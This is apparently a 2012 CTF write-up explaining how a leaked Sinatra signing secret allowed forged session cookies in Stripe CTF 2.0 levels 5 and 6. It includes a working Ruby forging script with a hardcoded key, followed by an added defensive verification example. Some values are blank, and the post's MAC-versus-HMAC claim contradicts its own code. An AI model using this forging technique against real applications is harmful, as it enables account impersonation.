Sep 18, 2012

Stripe’s Capture the Flag 2.0 – Bonus

Credera Team


This article is part 10 of a 10-part blog series detailing the approaches and solutions used to hack through Stripe’s 2012 CTF 2.0. To return to the parent article, or to see more of the hacks, please click here.

This blog entry details some bonus approaches used by Andre Azzolini in attacking the Stripe CTF 2.0 Challenge Levels 5 and 6.


This vulnerability was patched early on, but I was able to use it to exploit both levels 5 and 6. At first, Sinatra 500 errors would generate the debug Sinatra page, which just so happened to include the secret key that the server was using to sign session cookies. In my case, it looked like this:


You also have access to your session cookie, which might have looked like this:


Unfortunately, Sinatra is using a terrible HMAC function (really, it’s a MAC function — if it used HMAC, this wouldn’t have been a vulnerability).

Since we know the signing secret, we can rewrite values inside our session cookie, re-sign it, and it will still validate. For example, for level 5, I replaced “” with “”. For level 6, I replaced my username with “level07-password-holder”. This tricks Sinatra into thinking you’re someone else. You can achieve this with the following simple code:

require 'uri'
require 'base64'
require 'readline'
require 'openssl'

# Same construction Rack's cookie session middleware uses to sign the cookie body (HMAC-SHA1).
def generate_hmac(data, secret)
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
end

# paste in the original cookie value (the part before "--") for this
# (URI.decode_www_form_component replaces URI.unescape, which was removed in Ruby 3)
decoded_original = Marshal.load(Base64.decode64(URI.decode_www_form_component(Readline.readline('original: '))))
value_to_be_replaced = Readline.readline('value to be replaced: ') # this would be "" for example
value_to_replace_with = Readline.readline('value to replace with: ') # this would be "" for example

# edit the session hash as a Ruby literal (its inspect output), then eval it back into a hash
hacked_value = decoded_original.inspect.sub(value_to_be_replaced, value_to_replace_with)
encoded_hacked = Base64.encode64(Marshal.dump(eval(hacked_value)))

# this is the unpacked representation of the "dMx..." key posted above
secret = [100, 77, 120, -20, -31, -80, 102, 23, 23, 48, -118, -98, 99, -35, -28, 6, 7, -50, -45, 5, 27, -51, -47, 14].pack('c*')

hmac = generate_hmac(encoded_hacked, secret)
uri_encoded_hacked = URI.encode_www_form_component(encoded_hacked) # replaces URI.escape, also removed in Ruby 3
puts "\nThe hacked cookie is: #{uri_encoded_hacked}--#{hmac}"

Simply set your session cookie to the value printed by the program, and you’ll have gained the authorization you were after!
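To make the cookie format itself concrete from the server's side, here is an added Ruby example; it is not code from the original post, nor from Rack or Sinatra. It builds a cookie in the Rack::Session::Cookie wire format (URL-encoded base64 of a marshalled hash, then "--", then a hex HMAC) and verifies the digest in constant time before it unmarshals anything. It assumes the HMAC-SHA1 digest that Rack 1.x used, and the secret and session values are constructed for the demo. The defender's takeaway it shows is that the signature check holds up as long as the secret is unknown: a cookie re-signed with a guessed key is rejected, so the real failure in these levels was the exception page disclosing the secret, and the fix is to keep exception pages out of production and rotate the secret, not to swap the MAC.

```ruby
require 'openssl'
require 'uri'

# Rack 1.x's cookie session middleware signed the cookie body with
# HMAC-SHA1 keyed by the application secret (version assumed here).
def generate_hmac(data, secret)
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
end

# Constant-time comparison so the check does not leak how many leading
# bytes of a candidate digest matched.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# Serialise a session hash in the Rack::Session::Cookie wire format:
#   <url-encoded base64(Marshal.dump(hash))>--<hex hmac>
# [x].pack('m') is exactly what Base64.encode64 does internally.
def build_session_cookie(session_hash, secret)
  body = [Marshal.dump(session_hash)].pack('m')
  "#{URI.encode_www_form_component(body)}--#{generate_hmac(body, secret)}"
end

# Check the signature BEFORE unmarshalling: Marshal.load on bytes the client
# chose is itself unsafe. Returns the session hash, or nil if the cookie is
# malformed or its digest does not match.
def verify_session_cookie(cookie, secret)
  encoded, digest = cookie.to_s.split('--', 2)
  return nil if encoded.nil? || digest.nil?
  body = URI.decode_www_form_component(encoded)
  return nil unless secure_compare(generate_hmac(body, secret), digest)
  Marshal.load(body.unpack1('m'))
rescue ArgumentError
  nil # bad %-encoding in the cookie
end

# Constructed demo: a cookie signed with the real secret validates; the same
# session with a changed user, signed with a guessed secret, is rejected.
def demo
  real_secret = 'constructed-demo-secret-not-a-real-key'
  session = { 'session_id' => 'abc123', 'user' => 'alice' }
  genuine  = build_session_cookie(session, real_secret)
  tampered = build_session_cookie(session.merge('user' => 'admin'), 'wrong-guess')
  [verify_session_cookie(genuine, real_secret),
   verify_session_cookie(tampered, real_secret)]
end

if __FILE__ == $PROGRAM_NAME
  ok, rejected = demo
  puts "genuine cookie decodes to: #{ok.inspect}"
  puts "tampered cookie verifies as: #{rejected.inspect}"
end
```

Running the file prints the decoded session for the genuine cookie and `nil` for the one signed with the wrong key. The order inside `verify_session_cookie` is the design choice worth copying: split, decode, compare the MAC in constant time, and only then unmarshal.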


These solutions are presented as a unique approach to a recent CTF hacking contest as an outreach of the Credera Security Team. All ‘hacking’ was performed in an ethical manner in accordance with Credera’s Core Values. For further information on Credera’s offerings in ethical hacking, security, compliance, and OWASP preparedness please contact us at
